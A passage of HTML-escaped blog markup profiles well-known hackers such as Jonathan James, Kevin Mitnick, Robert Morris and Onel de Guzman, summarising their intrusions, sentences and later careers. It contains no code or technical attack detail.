&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/HRGwHRsIDym/http://bp1.blogger.com/_r8GjWqN6cvM/R5h_39LwbDI/AAAAAAAAAo4/qxTmYKXhA_U/s1600-h/Hackers_Jonathan.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159013972446309426&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5h_39LwbDI/AAAAAAAAAo4/qxTmYKXhA_U/s320/Hackers_Jonathan.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;The youth, known as &quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;cOmrade&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; on the Internet, pleaded guilty to intercepting 3,300 email messages at one of the Defense Department&#39;s most sensitive operations and stealing data from 13 NASA computers, including some devoted to the new International Space Station. James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. He installed a backdoor into a &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Defense Threat Reduction Agency server&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive e-mails and capture employee usernames and passwords.James also cracked into NASA computers, stealing software worth approximately &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;$1.7 million&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;$41,000 cost.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
3.Adrian Lamo-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/A32d4ATGiyr/http://bp1.blogger.com/_r8GjWqN6cvM/R5h_39LwbEI/AAAAAAAAApA/nNM99_i-_Lw/s1600-h/Hackers_lamo.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159013972446309442&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5h_39LwbEI/AAAAAAAAApA/nNM99_i-_Lw/s320/Hackers_lamo.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Dubbed the “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;homeless hacker&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. In a profile article, “He Hacks by Day, Squats by Night,” Lamo reflects, “I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional.”Dubbed the “homeless hacker,” he used Internet connections at&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Kinko’s&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, coffee shops and libraries to do his intrusions. For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;an award-winning journalist and public speaker.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;4.Kevin Mitnick-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;a href=&quot;http://www.zimbio.com/go/tnx8T_BgweX/http://bp1.blogger.com/_r8GjWqN6cvM/R5iAm9LwbFI/AAAAAAAAApI/FV8VfZdoeyA/s1600-h/Hackers_Mitnick.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159014779900161106&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5iAm9LwbFI/AAAAAAAAApI/FV8VfZdoeyA/s320/Hackers_Mitnick.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;The Department of Justice describes him as “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;the most wanted computer criminal in United States history&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.” His exploits were detailed in two movies: &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Freedom Downtime&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; and &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Takedown&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. He started out exploiting the&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Los Angeles bus punch card system to get free rides&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Digital Equipment Corporation’s computer network and stealing software&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.Today, Mitnick has been able to move past his role as a&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;black hat hacker&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; computer security consultant, author and speaker.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;br /&gt;
&lt;/span&gt;  &lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;5.Kevin Poulsen&lt;/span&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;a href=&quot;http://www.zimbio.com/go/IGPVnzJpkGt/http://bp3.blogger.com/_r8GjWqN6cvM/R5iAndLwbII/AAAAAAAAApg/bR1ynpSubtY/s1600-h/Hackers_Poulsen.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159014788490095746&quot; src=&quot;http://bp3.blogger.com/_r8GjWqN6cvM/R5iAndLwbII/AAAAAAAAApg/bR1ynpSubtY/s320/Hackers_Poulsen.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Also known as &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Dark Dante&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, Poulsen gained recognition for his hack of&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; LA radio’s KIIS-FM phone lines&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, (taing over all of the station’s phone lines) which earned him a brand new Porsche, among other items. Law enforcement dubbed him&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;“the Hannibal Lecter of computer crime&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.”Authorities began to pursue Poulsen after he hacked into a &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;federal investigation database&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.His hacking specialty, however, revolved around telephones. Poulsen’s most famous hack, In a related feat, Poulsen also “reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency.” Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;744 sex offenders with MySpace profiles.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;   &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;6.Robert Tappan Morris-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/zVwmbsK7Jxf/http://bp2.blogger.com/_r8GjWqN6cvM/R5iAnNLwbGI/AAAAAAAAApQ/fbe2fQrHguU/s1600-h/Hackers_morris.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159014784195128418&quot; src=&quot;http://bp2.blogger.com/_r8GjWqN6cvM/R5iAnNLwbGI/AAAAAAAAApQ/fbe2fQrHguU/s320/Hackers_morris.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the&lt;/span&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Morris_worm&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Morris Worm&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.&lt;br /&gt;
&lt;br /&gt;
Morris wrote the code for the worm while he was a student at&lt;/span&gt; &lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Cornell&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;6,000 machines&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. He was sentenced to three years’ probation, &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;400 hours of community service &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;and a&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; fined $10,500&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.Morris is currently working as a &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Roofnet.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;7.Vladimir Levin-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/4v1FrqEuaYe/http://bp0.blogger.com/_r8GjWqN6cvM/R5mQddLwbUI/AAAAAAAAArA/ygtnJHqQA-4/s1600-h/Hackers_arkanoid.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159313683854159170&quot; src=&quot;http://bp0.blogger.com/_r8GjWqN6cvM/R5mQddLwbUI/AAAAAAAAArA/ygtnJHqQA-4/s320/Hackers_arkanoid.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Levin accessed the accounts of several large corporate customers of&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Citiban&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;k&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; via their dial-up wire transfer service (Financial Institutions Citibank Cash Manager) and transferred funds to accounts set up by accomplices in &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Finland, the United States, the Netherlands, Germany and Israel&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.In 2005 an alleged member of the former St. Petersburg hacker group, claiming to be one of the original Citibank penetrators, published under the name &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;ArkanoiD&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; a memorandum on popular Provider.net.ru website dedicated to telecom market.According to him, Levin was not actually a scientist (mathematician, biologist or the like) but a kind of ordinary system administrator who managed to get hands on the ready data about how to penetrate in Citibank machines and then exploit them.ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. ArkanoiD’s group in 1994 found out Citibank systems were unprotected and it spent several weeks examining the structure of the bank’s USA-based networks remotely. Members of the group played around with systems’ tools (e.g. were installing and running games) and were unnoticed by the bank’s staff. Penetrators did not plan to conduct a robbery for their personal safety and stopped their activities at some time. Someone of them later handed over the crucial access data to Levin (reportedly for the stated $100).&lt;br /&gt;
&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;8.David Smith-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/Nwg4I3ggkUY/http://bp0.blogger.com/_r8GjWqN6cvM/R5mQddLwbTI/AAAAAAAAAq4/G2iixC05nAQ/s1600-h/hacker_smith.gif&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159313683854159154&quot; src=&quot;http://bp0.blogger.com/_r8GjWqN6cvM/R5mQddLwbTI/AAAAAAAAAq4/G2iixC05nAQ/s320/hacker_smith.gif&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;David Smith, the author of the e-mail virus known as&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Melissa&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, which swamped computers around the world, spreading like a malicious chain letter. He was facing nearly 40 &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;years in jail&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. About 63,000 viruses have rolled through the Internet, causing an estimated &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;$65 billion in damage&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, but Smith is the only person to go to federal prison in the United States for sending one.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;   &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;9.Mark Abene-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/ltlEL9tfL4n/http://bp0.blogger.com/_r8GjWqN6cvM/R5mR7dLwbXI/AAAAAAAAArY/n9d1z661Dkw/s1600-h/hacker_abene.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159315298761862514&quot; src=&quot;http://bp0.blogger.com/_r8GjWqN6cvM/R5mR7dLwbXI/AAAAAAAAArY/n9d1z661Dkw/s320/hacker_abene.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Abene (born 1972), better known by his pseudonym &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Phiber Optik&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, is a computer security hacker from&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; New York City&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Phiber Optik was once a member of the Hacker Groups Legion of &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Doom and Masters of Deception&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. In 1994, he served a one-year prison sentence for conspiracy and unauthorized access to computer and telephone systems.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;div style=&quot;line-height: 1.3em; margin: 0px 0px 10px ! important; padding: 0px 0px 10px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Phiber Optik was a high-profile hacker in the early 1990s, appearing in &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;The New York Times, Harper’s, Esquire, in debates and on television&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Phiber Optik is an important figure in the 1995 non-fiction book &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Masters of Deception — The Gang that Ruled Cyberspace&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;10.Onel A. de Guzman-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/SnLsShf3VYY/http://bp1.blogger.com/_r8GjWqN6cvM/R5mOntLwbQI/AAAAAAAAAqg/f4G60lIycqQ/s1600-h/Hacker_Guzman.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159311660924562690&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5mOntLwbQI/AAAAAAAAAqg/f4G60lIycqQ/s320/Hacker_Guzman.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;el A. de Guzman, a &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Filipino computer student&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, Greatest Hacker of all time. He was creator of &quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Love Bug&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; virus that crippled computer e-mail systems worldwide.&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;11.Chen Ing-hau-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
